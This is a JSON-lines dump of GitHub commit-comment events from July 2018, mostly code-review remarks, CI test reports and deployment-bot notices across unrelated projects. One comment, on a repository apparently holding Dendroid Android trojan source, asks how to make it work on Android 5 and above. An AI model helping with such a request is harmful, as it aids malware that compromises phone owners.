{"id":"8046537573","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29911236,"position":null,"line":null,"path":null,"commit_id":"688128aee04346a2f3e54f5b4808d95a7d137090","created_at":"2018-07-31T20:37:24Z","updated_at":"2018-07-31T20:37:24Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-MacOS-10.9-clang: OK (2864 of 2954 tests passed, 13 test warnings)\n\nMessages:\n\n * 67 tests had: BND diffs.\n * 61 tests had: MTD diffs.\n * 68 tests had: RDD diffs.\n * 57 tests had: AUD diffs.\n * 71 tests had: EIO diffs.\n * 61 tests had: ERR diffs.\n * 68 tests had: ESO big diffs.\n * 56 tests had: MDD diffs.\n * 59 tests had: MTR big diffs.\n * 67 tests had: Table big diffs.\n * 3 tests had: ESO small diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 658\n * SEGFAULT: 1\n\nintegration Test Summary\n * Passed: 607\n * Failed: 19\n\nregression Test Summary\n * Passed: 554\n * Failed: 70\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-688128aee04346a2f3e54f5b4808d95a7d137090-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-688128aee04346a2f3e54f5b4808d95a7d137090-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.95%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T20:37:24Z"}
{"id":"8046542765","type":"CommitCommentEvent","actor":{"login":"mDuo13"},"repo":{"name":"nbougalis/rippled"},"payload":{"comment":{"id":29911252,"position":6,"line":71,"path":"src/ripple/protocol/impl/TxFormats.cpp","commit_id":"f35f8fd94b6638d8198f8daff15f4246b4a9f18f","created_at":"2018-07-31T20:38:24Z","updated_at":"2018-07-31T20:38:24Z","author_association":"NONE","body":"`RequestedAmount` is slightly confusing since it makes you wonder if the sender of the transaction wants to receive money. I suggest perhaps changing this to `DeliverMax` which has a nice symmetry with `DeliverMin`, and fairly accurately represents the intended semantics of the field."}},"created_at":"2018-07-31T20:38:24Z"}
{"id":"8046542828","type":"CommitCommentEvent","actor":{"login":"okwolf"},"repo":{"name":"hyperapp/fx"},"payload":{"comment":{"id":29911253,"position":null,"line":null,"path":null,"commit_id":"a82aebff7dc4e4aca6b2b34d9a8adc473603d3a6","created_at":"2018-07-31T20:38:25Z","updated_at":"2018-07-31T20:38:25Z","author_association":"MEMBER","body":"@jorgebucaran perhaps this might become useful to projects other than Hyperapp one day? 🤔"}},"created_at":"2018-07-31T20:38:25Z"}
{"id":"8046545630","type":"CommitCommentEvent","actor":{"login":"ivanlmj"},"repo":{"name":"ivanlmj/puppy"},"payload":{"comment":{"id":29911261,"position":null,"line":null,"path":null,"commit_id":"0c13cf2b3ac16ba2d79e5162c0cb152e0c39727b","created_at":"2018-07-31T20:38:59Z","updated_at":"2018-07-31T20:38:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [TJS: Crear Herramienta para Manejo de Configuración (Servidor de Red)](https://trello.com/c/6x85fUIl/76-tjs-crear-herramienta-para-manejo-de-configuraci%C3%B3n-servidor-de-red)"}},"created_at":"2018-07-31T20:38:59Z"}
{"id":"8046545652","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29911262,"position":37,"line":34,"path":"test/account-mgmt.test.js","commit_id":"7df467541e113501e1b21b6b40801a2f1ccdf7ef","created_at":"2018-07-31T20:38:59Z","updated_at":"2018-07-31T20:38:59Z","author_association":"OWNER","body":"```const weiAmount = new BigNumber(Web3Utils.toWei(1)).plus(1)```\r\nresults in: \"Error: Please pass numbers as strings or BigNumber objects to avoid precision errors.\"\r\n\r\n```const weiAmount = new BigNumber(Web3Utils.toWei('1')).plus(1)```, and\r\n```const weiAmount = new BigNumber(Web3Utils.toWei('1')).plus(new BigNumber(1))```\r\nboth result in: \"TypeError: number.lessThan is not a function\""}},"created_at":"2018-07-31T20:38:59Z"}
{"id":"8046546423","type":"CommitCommentEvent","actor":{"login":"ivanlmj"},"repo":{"name":"ivanlmj/puppy"},"payload":{"comment":{"id":29911266,"position":null,"line":null,"path":null,"commit_id":"685a0b6dc2e090c34da682adff15119abf95b829","created_at":"2018-07-31T20:39:08Z","updated_at":"2018-07-31T20:39:08Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [TJS: Crear Herramienta para Manejo de Configuración (Servidor de Red)](https://trello.com/c/6x85fUIl/76-tjs-crear-herramienta-para-manejo-de-configuraci%C3%B3n-servidor-de-red)"}},"created_at":"2018-07-31T20:39:08Z"}
{"id":"8046548218","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29911278,"position":null,"line":null,"path":null,"commit_id":"96830bbe02e3a9c8f9508df847410f8005c5ed31","created_at":"2018-07-31T20:39:29Z","updated_at":"2018-07-31T20:39:29Z","author_association":"MEMBER","body":"Linked to #243 "}},"created_at":"2018-07-31T20:39:29Z"}
{"id":"8046551190","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware"},"payload":{"comment":{"id":29911285,"position":null,"line":null,"path":null,"commit_id":"e08352d50b3369c43fa5a1422157751fbcb286fe","created_at":"2018-07-31T20:40:04Z","updated_at":"2018-07-31T20:40:04Z","author_association":"CONTRIBUTOR","body":"@sarumpaet I was wondering if this patch might have something to do with issue #580. Or maybe you have an idea what the problem might be."}},"created_at":"2018-07-31T20:40:04Z"}
{"id":"8046553232","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29911297,"position":null,"line":null,"path":null,"commit_id":"b5f4597bea8974487aa6c615c36effbe9322f9b2","created_at":"2018-07-31T20:40:30Z","updated_at":"2018-07-31T20:40:30Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-479](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-479).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-479-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-31T20:40:30Z"}
{"id":"8046554451","type":"CommitCommentEvent","actor":{"login":"slashiee"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29911300,"position":null,"line":null,"path":null,"commit_id":"03985f783048a4d9d0bbd58b9df157ced198b781","created_at":"2018-07-31T20:40:44Z","updated_at":"2018-07-31T20:40:44Z","author_association":"OWNER","body":"can't you just do `formats = 0x11`?"}},"created_at":"2018-07-31T20:40:44Z"}
{"id":"8046563259","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29911315,"position":null,"line":null,"path":null,"commit_id":"cfd81bbcfaf0efdf9f059670bf7ec2b3ca5d9737","created_at":"2018-07-31T20:42:30Z","updated_at":"2018-07-31T20:42:30Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-308](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-308).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-308-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-31T20:42:30Z"}
{"id":"8046569110","type":"CommitCommentEvent","actor":{"login":"Cmerise"},"repo":{"name":"Cmerise/hello-world"},"payload":{"comment":{"id":29911325,"position":null,"line":null,"path":null,"commit_id":"a3c0f042e3afdd7e7052997711fe6bfcbf36903b","created_at":"2018-07-31T20:43:39Z","updated_at":"2018-07-31T20:43:39Z","author_association":"OWNER","body":":100: "}},"created_at":"2018-07-31T20:43:39Z"}
{"id":"8046573366","type":"CommitCommentEvent","actor":{"login":"sfmjr23"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29911346,"position":33,"line":33,"path":"Contracts/02_IRidePreICO.sol","commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-31T20:44:28Z","updated_at":"2018-07-31T20:44:28Z","author_association":"NONE","body":"0x3D16d7c1a030282FEece7f9833e7ff1F92a31567"}},"created_at":"2018-07-31T20:44:28Z"}
{"id":"8046575179","type":"CommitCommentEvent","actor":{"login":"JeromeMartinez"},"repo":{"name":"MediaArea/MediaInfoLib"},"payload":{"comment":{"id":29911352,"position":6,"line":464,"path":"Source/MediaInfo/File__Analyze_Streams_Finish.cpp","commit_id":"c5f7a61331dedca462f81139d9f5c44d605c65e4","created_at":"2018-07-31T20:44:50Z","updated_at":"2018-07-31T20:44:50Z","author_association":"MEMBER","body":"Oops... right. \"Some\" but is not worth a dedicated PR."}},"created_at":"2018-07-31T20:44:50Z"}
{"id":"8046577378","type":"CommitCommentEvent","actor":{"login":"samth"},"repo":{"name":"pycket/pycket"},"payload":{"comment":{"id":29911359,"position":4,"line":86,"path":"pycket/prims/parameter.py","commit_id":"7c13d017d432b7aa1f5508cac394fc0dc354d487","created_at":"2018-07-31T20:45:15Z","updated_at":"2018-07-31T20:45:15Z","author_association":"COLLABORATOR","body":"I don't think these should default to `true`."}},"created_at":"2018-07-31T20:45:15Z"}
{"id":"8046579811","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29911372,"position":null,"line":null,"path":null,"commit_id":"0e23a272f1bf4ab382714fb5fe77c2f6858cd909","created_at":"2018-07-31T20:45:42Z","updated_at":"2018-07-31T20:45:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-144](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-144).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-144-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T20:45:42Z"}
{"id":"8046590052","type":"CommitCommentEvent","actor":{"login":"rigor789"},"repo":{"name":"nativescript-vue/nativescript-vue"},"payload":{"comment":{"id":29911407,"position":null,"line":null,"path":null,"commit_id":"ce39a388ad5903c799cad8a54fc3fc29557f30b2","created_at":"2018-07-31T20:47:46Z","updated_at":"2018-07-31T20:47:46Z","author_association":"MEMBER","body":"For some reason the CI build failed on this commit - even though nothing has changed that would make it fail. \r\n\r\nhttps://circleci.com/gh/nativescript-vue/nativescript-vue/332\r\n\r\nSeems like it's a known issue: https://github.com/facebook/jest/issues/6766\r\n\r\nIf you get the chance @msaelices can you make the changes in the jest config to avoid the issue?"}},"created_at":"2018-07-31T20:47:46Z"}
{"id":"8046592660","type":"CommitCommentEvent","actor":{"login":"graham-at-target"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":29911413,"position":null,"line":null,"path":null,"commit_id":"e8f4d5a09dcc9719094fd8b5698276a51aa89ddb","created_at":"2018-07-31T20:48:17Z","updated_at":"2018-07-31T20:48:17Z","author_association":"CONTRIBUTOR","body":"This worked!\r\n\r\n```\r\n./inst/bin/nix copy /nix/store/...-nix-.../bin/nix --to 's3://my-nix-cache?endpoint=my-s3-compatible-api.com&profile=myprofile'\r\n```"}},"created_at":"2018-07-31T20:48:17Z"}
{"id":"8046597328","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29911426,"position":null,"line":null,"path":null,"commit_id":"f977d8d512c95d31bb5b21ccf6b2224af691ed8a","created_at":"2018-07-31T20:49:11Z","updated_at":"2018-07-31T20:49:11Z","author_association":"COLLABORATOR","body":"I was just reviewing it visually.  It looked like there was new code added when the checkbox is unchecked that goes through and deletes 100 attributes for the line segments.  Are the line segment attributes affecting start channels?  I just seem to remember I liked to sometimes uncheck the individual segments checkbox because it will fill in all the lines that are 0 length segments to let me quickly see the shape.  Then I recheck the box and restore it to all the sizes I had typed in."}},"created_at":"2018-07-31T20:49:11Z"}
{"id":"8046606855","type":"CommitCommentEvent","actor":{"login":"Hadzi1"},"repo":{"name":"szymonpolan/Game-Makao"},"payload":{"comment":{"id":29911462,"position":null,"line":null,"path":null,"commit_id":"0d5855b5b3d91b8391efac742c4d68a3a47c3de2","created_at":"2018-07-31T20:50:57Z","updated_at":"2018-07-31T20:50:57Z","author_association":"COLLABORATOR","body":"aha fajnie"}},"created_at":"2018-07-31T20:50:57Z"}
{"id":"8046607928","type":"CommitCommentEvent","actor":{"login":"atoomic"},"repo":{"name":"toddr/test-mockmodule"},"payload":{"comment":{"id":29911464,"position":8,"line":162,"path":"lib/Test/MockModule.pm","commit_id":"6752c1cf603e9cf8f8a653db9e824f1e72c60ed6","created_at":"2018-07-31T20:51:10Z","updated_at":"2018-07-31T20:51:10Z","author_association":"NONE","body":"could be done as a one-liner\r\nno warnings qw{redefine prototype}\r\nbut seems ok"}},"created_at":"2018-07-31T20:51:10Z"}
{"id":"8046608085","type":"CommitCommentEvent","actor":{"login":"keithsw1111"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29911465,"position":null,"line":null,"path":null,"commit_id":"f977d8d512c95d31bb5b21ccf6b2224af691ed8a","created_at":"2018-07-31T20:51:12Z","updated_at":"2018-07-31T20:51:12Z","author_association":"COLLABORATOR","body":"Yes but only the start channels ... not the segment sizes."}},"created_at":"2018-07-31T20:51:12Z"}
{"id":"8046609503","type":"CommitCommentEvent","actor":{"login":"luhaixun"},"repo":{"name":"kohsuke/sandbox-ant"},"payload":{"comment":{"id":29911470,"position":null,"line":null,"path":null,"commit_id":"8ae38db0ea5837313ab5f39d43a6f73de3bd9000","created_at":"2018-07-31T20:51:27Z","updated_at":"2018-07-31T20:51:27Z","author_association":"NONE","body":"[testing](http://kohsuse.org/)"}},"created_at":"2018-07-31T20:51:27Z"}
{"id":"8046611983","type":"CommitCommentEvent","actor":{"login":"SsnL"},"repo":{"name":"goodlux/tutorials"},"payload":{"comment":{"id":29911477,"position":62,"line":62,"path":"beginner_source/dcgan_faces_tutorial.py","commit_id":"3f358722fc23121b14a46696cfaa229a37e1f7e6","created_at":"2018-07-31T20:51:54Z","updated_at":"2018-07-31T20:51:54Z","author_association":"NONE","body":"The introduction is great and very easy to follow! Excellent job.\r\n"}},"created_at":"2018-07-31T20:51:54Z"}
{"id":"8046612411","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29911478,"position":null,"line":null,"path":null,"commit_id":"105c788ab385738115c9c361b1151de9c6f838f5","created_at":"2018-07-31T20:51:59Z","updated_at":"2018-07-31T20:51:59Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/105c788ab385738115c9c361b1151de9c6f838f5/index.html"}},"created_at":"2018-07-31T20:51:59Z"}
{"id":"8046613126","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"Jobsnguyenad/jekyll-textile-converter"},"payload":{"comment":{"id":29911479,"position":null,"line":null,"path":null,"commit_id":"a3d51daf443400854d22f0ff9f5fd31671c72286","created_at":"2018-07-31T20:52:08Z","updated_at":"2018-07-31T20:52:08Z","author_association":"OWNER","body":"a3d51da"}},"created_at":"2018-07-31T20:52:08Z"}
{"id":"8046614698","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"Jobsnguyenad/jekyll-textile-converter"},"payload":{"comment":{"id":29911482,"position":null,"line":null,"path":null,"commit_id":"a3d51daf443400854d22f0ff9f5fd31671c72286","created_at":"2018-07-31T20:52:24Z","updated_at":"2018-07-31T20:52:24Z","author_association":"OWNER","body":"a3d51da"}},"created_at":"2018-07-31T20:52:24Z"}
{"id":"8046614767","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29911483,"position":null,"line":null,"path":null,"commit_id":"a8a5f140659069c80d693c4eb8666615d8f05046","created_at":"2018-07-31T20:52:25Z","updated_at":"2018-07-31T20:52:25Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-145](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-145).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-145-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T20:52:25Z"}
{"id":"8046621054","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29911489,"position":null,"line":null,"path":null,"commit_id":"2bf12e5c36b52cb20b69e76e6d4e5f2204d57837","created_at":"2018-07-31T20:53:35Z","updated_at":"2018-07-31T20:53:35Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#ci-282](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#ci-282).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-282-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T20:53:35Z"}
{"id":"8046621254","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29911490,"position":null,"line":null,"path":null,"commit_id":"7df467541e113501e1b21b6b40801a2f1ccdf7ef","created_at":"2018-07-31T20:53:37Z","updated_at":"2018-07-31T20:53:37Z","author_association":"OWNER","body":"Resolved with 0a2e39585ba871259ae84c3bdc2af2ba42da5593"}},"created_at":"2018-07-31T20:53:37Z"}
{"id":"8046623114","type":"CommitCommentEvent","actor":{"login":"SsnL"},"repo":{"name":"goodlux/tutorials"},"payload":{"comment":{"id":29911491,"position":75,"line":75,"path":"beginner_source/dcgan_faces_tutorial.py","commit_id":"3f358722fc23121b14a46696cfaa229a37e1f7e6","created_at":"2018-07-31T20:53:58Z","updated_at":"2018-07-31T20:53:58Z","author_association":"NONE","body":"I'm not so sure about this paragraph. Yes, it is minimizing JSD and has a global solution there, but the convergence theory of GAN is really lacking and we don't know whether and how we get to a minima (global or local). I'd skip this paragraph, in case some readers try this on their favorite dataset and become confused why the result is bad."}},"created_at":"2018-07-31T20:53:58Z"}
{"id":"8046624058","type":"CommitCommentEvent","actor":{"login":"cderici"},"repo":{"name":"pycket/pycket"},"payload":{"comment":{"id":29911494,"position":4,"line":86,"path":"pycket/prims/parameter.py","commit_id":"7c13d017d432b7aa1f5508cac394fc0dc354d487","created_at":"2018-07-31T20:54:09Z","updated_at":"2018-07-31T20:54:09Z","author_association":"COLLABORATOR","body":"I don't know much about them actually. We seem to need them for generating `.zo`s. The expander complained about '#lang' when I was trying to compile-file the racket/hash, then I saw the `read-accept-lang` was already `#t`, but the `read-accept-reader` was false, so I turned it on and it worked. "}},"created_at":"2018-07-31T20:54:09Z"}
{"id":"8046625436","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29911498,"position":null,"line":null,"path":null,"commit_id":"33e06749ea62d2233ff8647aca5494cc87b0b34c","created_at":"2018-07-31T20:54:23Z","updated_at":"2018-07-31T20:54:23Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/33e06749ea62d2233ff8647aca5494cc87b0b34c/index.html"}},"created_at":"2018-07-31T20:54:23Z"}
{"id":"8046627339","type":"CommitCommentEvent","actor":{"login":"ssorj"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29911508,"position":35,"line":35,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T20:54:45Z","updated_at":"2018-07-31T20:54:45Z","author_association":"NONE","body":"Shouldn't we drop private_key_password?  I thought Gordon said it wasn't required."}},"created_at":"2018-07-31T20:54:45Z"}
{"id":"8046627678","type":"CommitCommentEvent","actor":{"login":"SsnL"},"repo":{"name":"goodlux/tutorials"},"payload":{"comment":{"id":29911511,"position":88,"line":88,"path":"beginner_source/dcgan_faces_tutorial.py","commit_id":"3f358722fc23121b14a46696cfaa229a37e1f7e6","created_at":"2018-07-31T20:54:49Z","updated_at":"2018-07-31T20:54:49Z","author_association":"NONE","body":":) Can you add links to pytorch docs for these layers? I believe that it would greatly helpful."}},"created_at":"2018-07-31T20:54:49Z"}
{"id":"8046630376","type":"CommitCommentEvent","actor":{"login":"SsnL"},"repo":{"name":"goodlux/tutorials"},"payload":{"comment":{"id":29911515,"position":89,"line":89,"path":"beginner_source/dcgan_faces_tutorial.py","commit_id":"3f358722fc23121b14a46696cfaa229a37e1f7e6","created_at":"2018-07-31T20:55:18Z","updated_at":"2018-07-31T20:55:18Z","author_association":"NONE","body":"Can you phrase this as a `3x64x64` image to be consistent with PyTorch CHW convention?"}},"created_at":"2018-07-31T20:55:18Z"}
{"id":"8046632280","type":"CommitCommentEvent","actor":{"login":"lordcharlx"},"repo":{"name":"gitPoc32/DendroidSource"},"payload":{"comment":{"id":29911523,"position":null,"line":null,"path":null,"commit_id":"b56155e54bcd9ab5af78802e5887ea0c7b72e602","created_at":"2018-07-31T20:55:39Z","updated_at":"2018-07-31T20:55:39Z","author_association":"NONE","body":"not working for android 5 and above ....any fix"}},"created_at":"2018-07-31T20:55:39Z"}
{"id":"8046635461","type":"CommitCommentEvent","actor":{"login":"Yay295"},"repo":{"name":"AniDevTwitter/animeopenings"},"payload":{"comment":{"id":29911529,"position":null,"line":null,"path":null,"commit_id":"b346b7e1849e4072d95670b1b979fc4caa169665","created_at":"2018-07-31T20:56:13Z","updated_at":"2018-07-31T20:56:13Z","author_association":"COLLABORATOR","body":"The commit message got messed up. It should be:\r\n\r\nfix overlap in `identifierToPartialFilename()`\r\n\r\n`$oped` and `$index` could include the same character in some situations, leading to a duplicated character in the output"}},"created_at":"2018-07-31T20:56:13Z"}
{"id":"8046635523","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"Jobsnguyenad/jekyll-textile-converter"},"payload":{"comment":{"id":29911530,"position":null,"line":null,"path":null,"commit_id":"a3d51daf443400854d22f0ff9f5fd31671c72286","created_at":"2018-07-31T20:56:13Z","updated_at":"2018-07-31T20:56:13Z","author_association":"OWNER","body":"jekyll:master Jobsnguyenad:Jobsnguyenad-patch-1"}},"created_at":"2018-07-31T20:56:13Z"}
{"id":"8046636729","type":"CommitCommentEvent","actor":{"login":"rafaelreisR"},"repo":{"name":"RodrigoEGC/Test_Initial_GIT"},"payload":{"comment":{"id":29911533,"position":null,"line":null,"path":null,"commit_id":"3a7ec7135a2c859674781e576a60117970218e65","created_at":"2018-07-31T20:56:27Z","updated_at":"2018-07-31T20:56:27Z","author_association":"NONE","body":"q coisa mais linda de se ver xP"}},"created_at":"2018-07-31T20:56:27Z"}
{"id":"8046637858","type":"CommitCommentEvent","actor":{"login":"fantasai"},"repo":{"name":"w3c/csswg-drafts"},"payload":{"comment":{"id":29911536,"position":22,"line":373,"path":"css-grid-2/Overview.bs","commit_id":"c2e0acf5da649d8e918954618c4a31418ee79508","created_at":"2018-07-31T20:56:39Z","updated_at":"2018-07-31T20:56:39Z","author_association":"CONTRIBUTOR","body":"Yes, good catch."}},"created_at":"2018-07-31T20:56:39Z"}
{"id":"8046638555","type":"CommitCommentEvent","actor":{"login":"SsnL"},"repo":{"name":"goodlux/tutorials"},"payload":{"comment":{"id":29911538,"position":160,"line":160,"path":"beginner_source/dcgan_faces_tutorial.py","commit_id":"3f358722fc23121b14a46696cfaa229a37e1f7e6","created_at":"2018-07-31T20:56:48Z","updated_at":"2018-07-31T20:56:48Z","author_association":"NONE","body":"hmm just to make sure. this is okay?"}},"created_at":"2018-07-31T20:56:48Z"}
{"id":"8046641235","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"Jobsnguyenad/jekyll-textile-converter"},"payload":{"comment":{"id":29911542,"position":14,"line":14,"path":"Committee.html","commit_id":"a3d51daf443400854d22f0ff9f5fd31671c72286","created_at":"2018-07-31T20:57:19Z","updated_at":"2018-07-31T20:57:19Z","author_association":"OWNER","body":"jekyll:master Jobsnguyenad:Jobsnguyenad-patch-1"}},"created_at":"2018-07-31T20:57:19Z"}
{"id":"8046644096","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"Jobsnguyenad/jekyll-textile-converter"},"payload":{"comment":{"id":29911551,"position":14,"line":14,"path":"Committee.html","commit_id":"a3d51daf443400854d22f0ff9f5fd31671c72286","created_at":"2018-07-31T20:57:52Z","updated_at":"2018-07-31T20:57:52Z","author_association":"OWNER","body":"jekyll:master Jobsnguyenad\r\n:Jobsnguyenad-patch-1"}},"created_at":"2018-07-31T20:57:52Z"}
{"id":"8046647792","type":"CommitCommentEvent","actor":{"login":"SsnL"},"repo":{"name":"goodlux/tutorials"},"payload":{"comment":{"id":29911560,"position":224,"line":224,"path":"beginner_source/dcgan_faces_tutorial.py","commit_id":"3f358722fc23121b14a46696cfaa229a37e1f7e6","created_at":"2018-07-31T20:58:33Z","updated_at":"2018-07-31T20:58:33Z","author_association":"NONE","body":"This is technically incorrect. The `0.5`s don't normalize them to mean=0 (also I think you meant mean=0) and stddev=1. They are set this way so that the `tanh` output can cover the same range as the image. I don't know if this detail is worth describing though..."}},"created_at":"2018-07-31T20:58:33Z"}
{"id":"8046649335","type":"CommitCommentEvent","actor":{"login":"ppozeti"},"repo":{"name":"manfredsteyer/angular-oauth2-oidc"},"payload":{"comment":{"id":29911566,"position":null,"line":null,"path":null,"commit_id":"e0c0e51fc517b975ef9b999afd75d561e731ed44","created_at":"2018-07-31T20:58:52Z","updated_at":"2018-07-31T20:58:52Z","author_association":"NONE","body":"The documentation says it assumes the app to be ran in 8080, but without this setting it was trying to run on 4200 by default."}},"created_at":"2018-07-31T20:58:52Z"}
{"id":"8046652014","type":"CommitCommentEvent","actor":{"login":"SsnL"},"repo":{"name":"goodlux/tutorials"},"payload":{"comment":{"id":29911572,"position":227,"line":227,"path":"beginner_source/dcgan_faces_tutorial.py","commit_id":"3f358722fc23121b14a46696cfaa229a37e1f7e6","created_at":"2018-07-31T20:59:25Z","updated_at":"2018-07-31T20:59:25Z","author_association":"NONE","body":":) I would instead suggest them to just exit early in the training loop. Seems much safer."}},"created_at":"2018-07-31T20:59:25Z"}
{"id":"8046653786","type":"CommitCommentEvent","actor":{"login":"remram44"},"repo":{"name":"ViDA-NYU/reprozip"},"payload":{"comment":{"id":29911576,"position":10,"line":400,"path":"reprounzip-qt/reprounzip_qt/reprounzip_interface.py","commit_id":"e2f7f56e1531548c0a4303eeb81d5d04474dd962","created_at":"2018-07-31T20:59:48Z","updated_at":"2018-07-31T20:59:48Z","author_association":"MEMBER","body":"This causes issues because Windows quoting is weird:\r\n```\r\n'pause\"' is not recognized as an internal or external command,\r\noperable program or batch file.\r\nTraceback (most recent call last):\r\n  File \"C:\\Program Files (x86)\\ReproUnzip\\python2.7\\lib\\site-packages\\reprounzip_qt\\gui\\run.py\", line 408, in _run\r\n    **options))\r\n  File \"C:\\Program Files (x86)\\ReproUnzip\\python2.7\\lib\\site-packages\\reprounzip_qt\\reprounzip_interface.py\", line 192, in run\r\n    root=root)\r\n  File \"C:\\Program Files (x86)\\ReproUnzip\\python2.7\\lib\\site-packages\\reprounzip_qt\\reprounzip_interface.py\", line 403, in run_in_system_terminal\r\n    shell=True)\r\n  File \"C:\\Program Files (x86)\\ReproUnzip\\python2.7\\lib\\subprocess.py\", line 186, in check_call\r\n    raise CalledProcessError(retcode, cmd)\r\nsubprocess.CalledProcessError: Command 'start /wait cmd /c \"^\"C:\\Program Files (x86)\\ReproUnzip\\reprounzip.bat^\" docker run C:\\Users\\remram\\Downloads\\digits_sklearn 0,1,2,3 & pause\"' returned non-zero exit status 1\r\n```\r\nFixed by ec0d7178."}},"created_at":"2018-07-31T20:59:48Z"}
{"id":"8046655463","type":"CommitCommentEvent","actor":{"login":"SsnL"},"repo":{"name":"goodlux/tutorials"},"payload":{"comment":{"id":29911580,"position":4,"line":73,"path":"index.rst","commit_id":"3f358722fc23121b14a46696cfaa229a37e1f7e6","created_at":"2018-07-31T21:00:08Z","updated_at":"2018-07-31T21:00:08Z","author_association":"NONE","body":"Also don't know if this should be in beginner or intermediate."}},"created_at":"2018-07-31T21:00:08Z"}
{"id":"8046660372","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29911613,"position":null,"line":null,"path":null,"commit_id":"a6700e38fab9b60a87d9df78eb192bbf1825a7d4","created_at":"2018-07-31T21:00:59Z","updated_at":"2018-07-31T21:00:59Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#ci-287](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#ci-287).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-287-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T21:00:59Z"}
